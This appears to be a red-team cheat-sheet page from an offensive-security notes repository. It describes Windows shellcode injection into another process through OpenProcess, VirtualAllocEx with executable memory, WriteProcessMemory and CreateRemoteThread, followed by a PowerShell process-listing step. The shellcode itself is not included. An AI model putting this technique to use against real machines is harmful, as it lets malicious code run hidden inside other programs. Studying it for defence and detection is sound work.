killchain-compendium/exploit/windows/process_injection/shellcode_injection.md

56 lines
1.2 KiB
Markdown
Raw Normal View History

2022-04-14 01:06:16 +02:00
# Process Injection
## Shellcode injection
* Open a process
```sh
processHandle = OpenProcess(
PROCESS_ALL_ACCESS, // Defines access rights
FALSE, // Target handle will not be inhereted
DWORD(atoi(argv[1])) // Local process supplied by command-line arguments
);
```
* Allocate memory
```sh
remoteBuffer = VirtualAllocEx(
processHandle, // Opened target process
NULL,
sizeof shellcode, // Region size of memory allocation
(MEM_RESERVE | MEM_COMMIT), // Reserves and commits pages
PAGE_EXECUTE_READWRITE // Enables execution and read/write access to the commited pages
);
```
* Write shellcode to memory allocated
```sh
WriteProcessMemory(
processHandle, // Opened target process
remoteBuffer, // Allocated memory region
shellcode, // Data to write
sizeof shellcode, // byte size of data
NULL
);
```
* Execute shellcode inside a created thread
```sh
remoteThread = CreateRemoteThread(
processHandle, // Opened target process
NULL,
0, // Default size of the stack
(LPTHREAD_START_ROUTINE)remoteBuffer, // Pointer to the starting address of the thread
NULL,
0, // Ran immediately after creation
NULL
);
```
* Compile
* Check processes via
```sh
Get-Process -IncludeUserName
```
* Run on process ID as argv1